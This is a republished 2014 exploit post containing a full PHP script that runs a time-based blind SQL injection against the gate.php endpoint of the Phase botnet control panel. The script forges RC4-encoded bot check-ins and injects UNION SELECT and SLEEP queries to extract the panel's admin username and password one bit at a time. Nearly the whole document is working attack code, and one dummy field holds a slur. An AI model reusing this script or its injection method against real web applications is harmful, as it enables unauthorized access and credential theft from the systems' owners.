Phase botnet blind SQL injection vulnerability
来源:vfocus.net 作者:Xylitol 发布时间:2014-12-24  
<?php
        // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
        // Start with PHP CLI (php pwn.php)
        set_time_limit(0);
          
        // Adjust this :)
        define('SLEEP_TIME', '4');
        define('PAGE_TIME',  4);
        define('URL',        'http://localhost/Phase/');
          
        echo('attacking ' . URL . PHP_EOL);
          
        get_string('username');
        get_string('password');
          
        function get_length($field) {
                $length = 1;
                  
                while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
                        ++$length;
                }
                  
                echo($field . ' length: ' . $length . PHP_EOL);
                  
                return $length;
        }
          
        function get_string($field) {
                $length = get_length($field);
                $str    = '';
                  
                for ($i = 0; $i < $length; ++$i) {
                        $str .= chr(get_char($field, $i));
                        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
                }
                  
                return $str;
        }
          
        function get_char($field, $id) {
                $binary = '';
                  
                for ($i = 1; $i < 256; $i *= 2) {
                        if ($i == 128)
                                $binary = '0' . $binary;
                        else
                                $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
                }
                  
                return bindec($binary);
        }
          
        function is_true($query) {
                $rc4_key   = 'aaaa'; // b d u
                $data      = 'u=tapz&d=faggot&b=lol';
                $encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
                $encode    = $rc4_key . $encode;
                $injection = urlencode($query);
                $req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
                  
                return !($req['time'] < PAGE_TIME);
        }
          
        function post_request($url, $data) {
        $handle = curl_init($url);
          
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
                curl_setopt($handle, CURLOPT_TIMEOUT,        30);
          
                $time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
                  
        curl_close($handle);
                  
        return array(
                        'page' => $page,
                        'time' => $time
                );
    }
          
        function rc4($pwd, $data, $data_length, $pwd_length){
                $key[] = '';
                $box[] = '';
                $cipher = '';
  
                for ($i = 0; $i < 256; $i++)
                {
                        $key[$i] = ord($pwd[$i % $pwd_length]);
                        $box[$i] = $i;
                }
                for ($j = $i = 0; $i < 256; $i++)
                {
                        $j = ($j + $box[$i] + $key[$i]) % 256;
                        $tmp = $box[$i];
                        $box[$i] = $box[$j];
                        $box[$j] = $tmp;
                }
                for ($a = $j = $i = 0; $i < $data_length; $i++)
                {
                        $a = ($a + 1) % 256;
                        $j = ($j + $box[$a]) % 256;
                        $tmp = $box[$a];
                        $box[$a] = $box[$j];
                        $box[$j] = $tmp;
                        $k = $box[(($box[$a] + $box[$j]) % 256)];
                        $cipher .= chr(ord($data[$i]) ^ $k);
                }
                return $cipher;
        }
  

 